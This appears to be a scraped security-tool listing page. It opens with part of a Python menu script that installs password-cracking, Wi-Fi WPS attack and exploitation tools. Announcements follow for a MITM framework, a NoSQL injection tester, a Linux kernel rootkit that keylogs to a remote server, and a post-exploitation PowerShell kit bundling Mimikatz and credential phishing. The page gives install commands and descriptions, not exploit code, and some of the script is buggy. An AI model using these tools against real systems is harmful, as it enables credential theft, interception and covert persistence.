print("cupp is a password list generator ")
print("Usage: python cupp.py -h")
print("yes or now")
choicecupp = raw_input("y / n :")
if choicecupp in yes:
os.system("git clone https://github.com/Mebus/cupp.git");os.system("cd cupp")
elif choicecupp in no:
os.system("clear"); passwd()
#ncrack
def ncrack():
print("A Ruby interface to Ncrack, Network authentication cracking tool.")
print("requires : nmap >= 0.3ALPHA / rprogram ~> 0.3")
print("1 to accept / 0 to decline")
choicencrack = raw_input("y / n :")
if choicencrack in yes:
os.system("git clone https://github.com/sophsec/ruby-ncrack.git");os.system("cd ruby-ncrack");os.systemgem("install ruby-ncrack")
elif choicencrack in no:
os.system("clear"); passwd()
#reaver
def reaver():
print("Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup")
print(" WPS registrar PINs in order to recover WPA/WPA2 passphrases. It has been tested against a")
print(") wide variety of access points and WPS implementations")
print("1 to accept / 0 to decline")
creaver = input("y / n :")
if creaver in yes:
os.system("apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps");os.system("git clone https://github.com/t6x/reaver-wps-fork-t6x.git");os.system("cd reaver-wps-fork-t6x");os.system("cd src/");os.system("./configure");os.system("make")
elif creaver in no:
os.system("clear"); wire()
#####################################
#information gathering function
def info():
print("1 : nmap ")
print("3 : SET tool kit")
print("99 :Go Back To Main Menu")
choice2 = input("selet a number :")
choice2 = int(choice2)
if choice2 ==1:
os.system('clear'); nmap()
if choice2 ==3:
os.system("clear"); setoolkit()
elif choice2 ==99:
os.system("clear"); menu()
#end of menu
##########################
#password attacks menu
def passwd():
print("1 : cupp ")
print("2 : Ncrack")
print("99:Back To Main Menu")
choice3 = input("selet a number :")
choice3 = int(choice3)
if choice3 ==1:
os.system("clear"); cupp()
elif choice3 ==2:
os.system("clear"); ncrack()
elif choice3 ==99:
os.system("clear"); menu()
#end of menu
##########################
#wireless attacks
def wire():
print("1 : reaver ")
print("99: Go Back To The Main Menu")
choice4 = input("selet a number :")
choice4 = int(choice4)
if choice4 ==1:
os.system("clear");reaver()
elif choice4 ==99:
menu()
##########################
#exploitation tools
def exp():
print("1 : jboss-autopwn ")
print("2 : sqlmap")
print("99 : Go Back To Main Menu")
choice5 = input("selet a number :")
choice5 = int(choice5)
if choice5 ==2:
os.system("clear"); sqlmap()
if choice5 ==1:
os.system('clear'); jboss()
elif choice5 ==99:
menu()
###########################
#sniffing tools
def snif():
print("1 : Set Tool kit ")
print("99: Back To Main Menu")
choice6 = input("selet a number :")
choice6 = int(choice6)
if choice6 ==1:
os.system("clear"); setoolkit()
if choice6 ==99:
os.system("clear"); menu()
#end of menu
##########################
#Check use OS
def OS():
print(
"""
Choose Operating System :
1) Max OSX
2) Linux
3) Windows
""")
system = input(":")
system = str(system)
if system ==2:
root()
else :
menu()
############################
#check root if linux
def root():
if os.getuid() != 0:
print("Are you root? Please execute as root")
exit()
#############################
#begin :D
OS()Source: https://github.com/x3omdax
Changelog v1.1.10:
New Features
+ Implemented –silent option to suppress Logger messages.
+ Implemented –no-target-nbns option to disable targets NBNS hostname resolution.
+ Implemented –custom-parser REGEX option to use a custom regular expression for the sniffer.
+ Option -T|–target now supports both ip and mac addresses.
+ Using StreamLogger for both Proxy and Sniffer traffic. Better sniffer logging.
Fixes:
+ Fixed a bug which caused the logger to raise an exception when -h|–help option is passed.
+ Give some time to the discovery thread to spawn its workers, this prevents Too many open files errors to delay host discovery.
+ Fixed a bug which caused exceptions not to be printed.
+ Suppress log messages as soon as CTRL+C is pressed.
Code Style:
+ Removed deprecated tests folder.
+ Wrapped every class with module BetterCap and refactored old code structure.
+ Various refactoring with if/unless boolean conditions.
Bettercap-v-1-1-10
bettercap is a complete, modular, portable and easily extensible MITM tool and framework with every kind of diagnostic and offensive feature you could need in order to perform a man in the middle attack.
DEPENDS:
All dependencies will be automatically installed through the GEM system, in some case you might need to install some system dependency in order to make everything work:
sudo apt-get install ruby-dev libpcap-dev
HOW TO INSTALL:
Stable Release ( GEM ):
gem install bettercap
From Source:
Ubuntu/Debian/Kali: sudo apt-get install ruby-dev libpcap-dev Fedora/Centos/redhat yum install ruby-dev libpcap-dev git clone https://github.com/evilsocket/bettercap cd bettercap gem build bettercap.gemspec sudo gem install bettercap*.gem
Download : v1.1.10.tar.gz | v1.1.10.zip
Source : http://www.bettercap.org/ | Our Post Before
nosqlattack is an application that tries to automate some stuff when testing for injection attacks in JS and NoSQL web aplications. Some of the functionality is targeted directly at the database, but most of the functionlity is targeted at the web forms and it tries to insert either JS or change the database query.
nosqlattack v0.1.0
Application Overview:
The application is written in Rust and is written with modularity in mind. There are two main functions:
+ Authentication attacks against the DB
+ Injection attacks against a web application
Authentication attacks:
Some high level traits are defined. Each specific DB-attack implementation must create these traits. Currently, only MongoDB and CouchDB are defined.
Injection attacks:
All attacks are defined in an .ini file, so new attacks can be created without re-compiling the application. The .ini file is parsed to create 1 or more attacks out of each defined attack. See more details in data/inject.ini.
The functionality of the parser is a bit limited, but it can still create some decent injection attacks.
TODO:
+ Analyze web form so we don’t have to type that manually.
+ Specify exploit code .ini file so we can display an example of exploit code for manual verification.
+ Implement blind NoSQL injection for dumping the entire DB.
See “ServerSide JavaScript Injection: Attacking NoSQL and Node.js” by Bryan Sullivan
+ Inject in header fields as well
+ Add vulnerable example application
Usage, Dependency and installation:
Windows 32 bit https://static.rust-lang.org/dist/rust-1.0.0-i686-pc-windows-gnu.msi https://static.rust-lang.org/cargo-dist/cargo-nightly-i686-pc-windows-gnu.tar.gz windows 64 bit https://static.rust-lang.org/dist/rust-1.0.0-x86_64-pc-windows-gnu.msi https://static.rust-lang.org/cargo-dist/cargo-nightly-x86_64-pc-windows-gnu.tar.gz after dependency install git clone https://github.com/rstenvi/nosqlattack cd nosqlattack cargo build cargo run (or rustc /target/debug/nosqlattack) All Linux: curl -sSf https://static.rust-lang.org/rustup.sh | sh git clone https://github.com/rstenvi/nosqlattack cd nosqlattack cargo build cargo run or rustc /target/debug/nosqlattack
Source : https://github.com/rstenvi
NOTICE : This POST for Research Purpose Only!
Introduction:
In the following we want to explore how to make a linux kernel rootkit. As the definition of a rootkit stats it should run as root and should be hard to detect for users. To give the rootkit real value it has to do something. We decided to go with two very common usecases when it comes to
Implementation:
This section deals about keylogging in linux kernel. Keylogging describes the process of intercepting all input keys from a keyboard. Our rootkit intercept all keys and send them to a server. It is possible to activate and deactivate the keylogging function. To implement a keylogger in the linux kernel you must register a keyboard notifier.
rootkit-client
Rootkit client Menu:
usage: ./rootkit_client.py [-a key] [-d key] [-h <host>]
[-u]
-a key sends a magic package to the rootkit and activates the keylogger and listens
-d key sends a magic package to the rootkit and deactivates the keylogger
-a hide sends a magic package to the rootkit and activates modul hiding
-d hide sends a magic package to the rootkit and deactivates modul hiding
-a root sends a magic package to the rootkit and activate the root shell
-h <host> the ip for the host where the rootkit is running
Usage:
git clone https://github.com/soad003/rootkit cd rootkit make insmod rootkt.ko (for load module on server) rmmod rootkt.ko (for Unload module on server) Client: ./rootkit_client.py
Source : https://github.com/soad003
p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off), and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.
p0wnedShell v1.2 – PowerShell Runspace Post Exploitation Toolkit.
what’s new in 2016:
+ Added MS15-051 Kernel Exploit
What’s inside the runspace:
The following PowerShell tools/functions are included:
+ PowerSploit Invoke-Shellcode
+ PowerSploit Invoke-ReflectivePEInjection
+ PowerSploit Invoke-Mimikatz
+ PowerSploit Invoke-TokenManipulation
+ Veil’s PowerTools PowerUp
+ Veil’s PowerTools PowerView
+ HarmJ0y’s Invoke-Psexec
+ Besimorhino’s PowerCat
+ Nishang Invoke-PsUACme
+ Nishang Invoke-Encode
+ Nishang Get-PassHashes
+ Nishang Invoke-CredentialsPhish
+ Nishang Port-Scan
+ Nishang Copy-VSS
Powershell functions within the Runspace are loaded in memory from Base64 encode strings.
The following Binaries/tools are included:
+ Benjamin DELPY’s Mimikatz
+ Benjamin DELPY’s MS14-068 kekeo Exploit
+ Didier Stevens modification of ReactOS Command Prompt
+ hfiref0x MS15-051 Local SYSTEM Exploit
Binaries are loaded in memory using ReflectivePEInjection (Byte arrays are compressed using Gzip and saved within p0wnedShell as Base64 encoded strings).
How to build:
download *.zip and unzip it Open your Visual Studio Community right click p0wnedShell open with Your Visual Studion version.. Build p0wnedShell
Download: p0wnedShell-master.zip(1.6 MB)
Source : https://github.com/Cn33liz
